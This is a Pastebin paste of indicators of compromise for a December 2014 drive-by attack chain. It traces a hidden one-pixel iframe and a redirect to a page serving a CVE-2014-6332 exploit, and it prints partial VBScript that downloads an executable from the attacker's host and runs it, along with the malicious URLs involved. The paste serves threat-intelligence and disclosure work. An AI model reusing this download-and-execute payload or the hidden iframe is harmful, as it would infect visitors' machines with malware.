Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // IOC - capovelo.com - 2014-12-18
- // Visiting 'capovelo.com' might initiate a redirect chain that ends up on a website hosting CVE-2014-6332 exploit. Successful exploitation leads to downloading a variant of Andromeda malware - https://www.virustotal.com/en/file/6cc32beb7932f50e143033d7b50e4d278636510b6f186c863492296b6feb134a/analysis/
- // Redirect chain can be triggered by visiting - http://capovelo.com/community/page/index.html/_/articles/frontpage/thomas-weisel-responds-to-lance-armstrongs-r271
- // The returned page contains the following <iframe>:
- <iframe src="http://www.beyondrealitypack.com/Forums/uploads/monthly_12_2013/index.php?out=1418488864" width="1" height="1" frameborder="0"></iframe>
- // When requested it returns 302 pointing at - http://fabesinternational.com/wp-content/plugins/wp_module/iee.php
- // 'iee.php' contains exploit code for CVE-2014-6332. See partial example of the code:
- <!doctype html>
- <html>
- <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
- <body>
- <SCRIPT LANGUAGE="VBScript">
- function runmumaa()
- On Error Resume Next
- Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
- oXMLHTTP.Open "GET", "http://fabesinternational.com/wp-content/plugins/wp_module/calc.exe", 0
- oXMLHTTP.Send
- Set oADOStream = CreateObject("ADODB.Stream")
- oADOStream.Mode = 3 '?????????? ?? ?????? ? ??????
- oADOStream.Type = 1 '??? ?????? - Binary
- oADOStream.Open
- oADOStream.Write oXMLHTTP.responseBody
- oADOStream.SaveToFile "cal.exe", 2
- set shell = createobject("Shell.Application")
- shell.ShellExecute "cal.exe"
- end
- function
- </script>
- <SCRIPT LANGUAGE="VBScript">
- dim aa()
- dim ab()
- dim a0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement